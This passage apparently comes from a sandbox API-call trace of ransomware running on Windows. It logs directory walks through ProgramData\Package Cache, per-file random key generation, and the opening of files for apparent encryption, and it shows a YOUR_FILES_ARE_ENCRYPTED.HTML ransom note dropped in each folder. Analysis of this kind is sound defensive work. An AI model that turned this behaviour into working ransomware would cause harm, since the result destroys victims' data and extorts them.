ftLastWriteTime.dwLowDateTime=0x4c905d7a, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0108.859] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c8dfa73, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c905d7a, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0108.859] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c905d7a, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0108.859] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.859] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned 91 [0108.859] GetProcessHeap () returned 0x600000 [0108.859] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0108.860] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" [0108.860] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*" [0108.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c905d7a, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0f18, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x626838 [0108.860] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c905d7a, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0f18, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0108.860] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9371b3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9371b3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0f18, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0108.861] StrStrIW (lpFirst="vcRuntimeMinimum_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.861] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned 114 [0108.861] GetProcessHeap () returned 0x600000 [0108.861] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0108.862] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" [0108.862] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*" [0108.862] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9371b3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9371b3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0108.863] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9371b3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9371b3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0108.863] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb519600, ftCreationTime.dwHighDateTime=0x1cf3e1d, ftLastAccessTime.dwLowDateTime=0xeb519600, ftLastAccessTime.dwHighDateTime=0x1cf3e1d, ftLastWriteTime.dwLowDateTime=0xeb519600, ftLastWriteTime.dwHighDateTime=0x1cf3e1d, nFileSizeHigh=0x0, nFileSizeLow=0xfc90a, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0108.863] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.863] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0108.863] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.863] lstrlenW (lpString=".cab") returned 4 [0108.863] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.863] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0108.863] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0108.863] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=1034506) returned 1 [0108.863] GetProcessHeap () returned 0x600000 [0108.863] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x681350 [0108.866] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="54") returned 2 [0108.866] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="31") returned 2 [0108.866] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="82") returned 2 [0108.866] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="C5") returned 2 [0108.866] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="B3") returned 2 [0108.866] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="10") returned 2 [0108.866] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="AA") returned 2 [0108.866] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="BC") returned 2 [0108.866] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="BB") returned 2 [0108.866] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="88") returned 2 [0108.866] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="05") returned 2 [0108.866] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="B6") returned 2 [0108.866] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="14") returned 2 [0108.867] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="E1") returned 2 [0108.867] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="41") returned 2 [0108.867] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="64") returned 2 [0108.867] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="43") returned 2 [0108.867] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="0C") returned 2 [0108.867] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="AA") returned 2 [0108.867] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="1D") returned 2 [0108.867] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="A6") returned 2 [0108.867] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="3D") returned 2 [0108.867] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="19") returned 2 [0108.867] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="B8") returned 2 [0108.867] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="07") returned 2 [0108.867] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="CE") returned 2 [0108.867] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="B3") returned 2 [0108.867] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="5A") returned 2 [0108.867] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="E1") returned 2 [0108.867] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="0D") returned 2 [0108.867] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="E6") returned 2 [0108.867] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="7B") returned 2 [0108.868] lstrcpyW (in: lpString1=0x691404, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0108.868] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x681350, NumberOfConcurrentThreads=0x0) returned 0x274 [0108.868] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x681350, lpOverlapped=0x681350) returned 1 [0108.868] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea206900, ftCreationTime.dwHighDateTime=0x1cf3e1d, ftLastAccessTime.dwLowDateTime=0xea206900, ftLastAccessTime.dwHighDateTime=0x1cf3e1d, ftLastWriteTime.dwLowDateTime=0xea206900, ftLastWriteTime.dwHighDateTime=0x1cf3e1d, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0108.868] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.868] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0108.868] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0108.868] lstrlenW (lpString=".msi") returned 4 [0108.868] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0108.868] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea206900, ftCreationTime.dwHighDateTime=0x1cf3e1d, ftLastAccessTime.dwLowDateTime=0xea206900, ftLastAccessTime.dwHighDateTime=0x1cf3e1d, ftLastWriteTime.dwLowDateTime=0xea206900, ftLastWriteTime.dwHighDateTime=0x1cf3e1d, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0108.868] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0108.868] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 144 [0108.868] GetProcessHeap () returned 0x600000 [0108.868] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0108.869] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0108.871] WriteFile (in: hFile=0x32c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0108.873] CloseHandle (hObject=0x32c) returned 1 [0108.875] GetProcessHeap () returned 0x600000 [0108.875] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0108.875] GetProcessHeap () returned 0x600000 [0108.875] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0108.875] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9371b3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9371b3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0f18, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0108.875] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0108.876] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0108.876] GetProcessHeap () returned 0x600000 [0108.876] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0108.876] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0108.876] WriteFile (in: hFile=0x308, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0108.877] CloseHandle (hObject=0x308) returned 1 [0108.878] GetProcessHeap () returned 0x600000 [0108.878] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0108.879] GetProcessHeap () returned 0x600000 [0108.879] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.880] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c905d7a, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0108.880] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0108.880] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0108.880] GetProcessHeap () returned 0x600000 [0108.880] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0108.880] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.881] WriteFile (in: hFile=0x30c, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.882] CloseHandle (hObject=0x30c) returned 1 [0108.882] GetProcessHeap () returned 0x600000 [0108.882] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0108.882] GetProcessHeap () returned 0x600000 [0108.882] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.883] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c0dea, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388c34a7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0108.884] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.884] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 82 [0108.884] GetProcessHeap () returned 0x600000 [0108.884] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0109.083] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0109.083] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*" [0109.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c0dea, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388c34a7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.084] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c0dea, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388c34a7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0109.084] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388c34a7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0109.085] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.085] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned 91 [0109.085] GetProcessHeap () returned 0x600000 [0109.085] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.086] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0109.086] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*" [0109.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388c34a7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1700, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0109.086] FindNextFileW (in: hFindFile=0x6265b8, 